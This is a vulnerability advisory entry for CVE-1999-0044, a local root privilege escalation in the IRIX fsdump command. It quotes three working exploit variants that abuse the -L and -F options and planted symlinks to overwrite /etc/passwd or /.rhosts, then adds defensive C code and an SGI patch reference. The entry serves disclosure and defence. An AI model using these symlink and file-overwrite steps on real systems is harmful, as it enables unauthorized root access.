IRIX fsdump Command Permissions and Access Control Vulnerability

Vulnerability ID: 1105269
Vulnerability type: Unknown
Published: 1996-12-03
Updated: 2005-05-02
CVE ID: CVE-1999-0044
CNNVD-ID: CNNVD-199612-002
Affected platform: IRIX
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19280
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199612-002
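|Vulnerability details
The IRIX fsdump command contains a vulnerability that allows local users to gain root privileges by modifying sensitive files.
|Exploit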
source: http://www.securityfocus.com/bid/355/info

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privilege.

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme
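
The three variants above all depend on a privileged program acting on a caller-named path (-L, -F) or on a symlink planted under a predictable name. The following is an added example, not SGI's code or its patch, of the checks a privileged tool can apply before writing to such a path; the function name open_user_log and the scratch file names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open a caller-named log for append on behalf of `uid`.
 * Returns an fd, or -1 with errno set. It never chowns or truncates. */
int open_user_log(const char *path, uid_t uid)
{
    struct stat st;
    /* New file: O_EXCL creates atomically and rejects any pre-planted name,
     * including a symlink (the setup used in Variants 2 and 3). */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0 || errno != EEXIST)
        return fd;
    /* Existing name: never follow a symlink in the last path component.
     * O_NONBLOCK keeps a planted FIFO from hanging the privileged process. */
    fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                       /* ELOOP when path is a symlink */
    /* fstat() the opened object, not the path, so there is no check/use race.
     * Accept only a regular, singly linked file the caller already owns;
     * this refuses -L/etc/passwd (Variant 1) for a non-root caller. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != uid || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(void)
{
    char dir[] = "/tmp/logdemoXXXXXX";   /* constructed scratch directory */
    if (!mkdtemp(dir) || chdir(dir) != 0)
        return 1;
    int fd = open_user_log("dump.log", geteuid());
    printf("new file: %s\n", fd >= 0 ? "opened" : "refused");
    if (fd >= 0) close(fd);
    if (symlink("dump.log", "rfd.lock") != 0)
        return 1;
    fd = open_user_log("rfd.lock", geteuid());
    printf("symlink:  %s\n", fd >= 0 ? "opened" : "refused");
    return 0;
}
```

O_NOFOLLOW covers only the last path component, so a set-id tool should still switch to the caller's real uid before touching caller-named paths.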
|References

Source: SGI
Name: 19970301-01-P
Link: ftp://patches.sgi.com/support/free/security/advisories/19970301-01-P